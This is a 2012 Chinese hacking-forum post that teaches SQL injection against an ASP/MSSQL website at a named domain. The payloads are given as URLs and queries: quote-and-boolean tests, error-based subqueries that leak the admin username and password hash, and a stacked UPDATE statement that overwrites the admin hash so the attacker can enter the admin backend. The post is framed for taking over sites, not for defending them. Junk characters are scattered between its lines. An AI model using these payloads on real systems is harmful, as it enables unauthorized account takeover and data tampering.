中国网络渗透测试联盟
标题:
SQL注入直接修改管理员密码的MD5值
[打印本页]
作者:
admin
时间:
2012-9-13 17:55
标题:
SQL注入直接修改管理员密码的MD5值
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
6 H# Q9 e4 p4 x( A& F7 t% [6 r
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
& m8 r5 [" C% A5 ^2 x& }
测试如下:
# F7 e9 E- @5 z: y4 p3 G+ h
http://www.tmdsb.com/news.asp?id=121
, e% z" x& n2 l6 A# Q
在地址后输入单引号,显示
& s1 u* F5 [+ |, U
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
, @ Q2 o: X: v, }
字符串 ’’’ 之前有未闭合的引号
9 I* s) g( I; T( i5 Z
/news/tmdws.asp,行63
, r6 l( f5 |' V4 N/ v7 u) d8 O
说明没有过滤单引号且数据库是MSSQL.
3 v/ f4 z7 Y2 W! M3 N1 f2 z) n
and 1=1正常。and 1=2出错。肯定存在注入
$ w) e4 l- x6 f/ Z: m
接着输入
3 q: _* X3 f2 h3 A
http://www.tmdsb.com/news.asp?id=1
or admin_user in (select id from admin)
+ H2 x- x1 \: w& W
得到帐号为:admin
3 X6 p) J. c5 y5 Y3 D6 ]
http://www.tmdsb.com/news.asp?id=121
or admin_password in (select id from admin)
) X& L- @" j9 F$ s' r2 P
得到密码为:a4716077c2ba075c
$ t2 M! E0 L$ R% v& u$ w
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
- E; k# C3 C1 K( ]2 ~% N/ @
命令如下 :
' v4 w# e x/ Y& {" c; h. ~% S N
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
$ }' \3 W8 { Y& S
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的
作者:
angel
时间:
2012-9-14 16:22
没法说 一个字牛
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2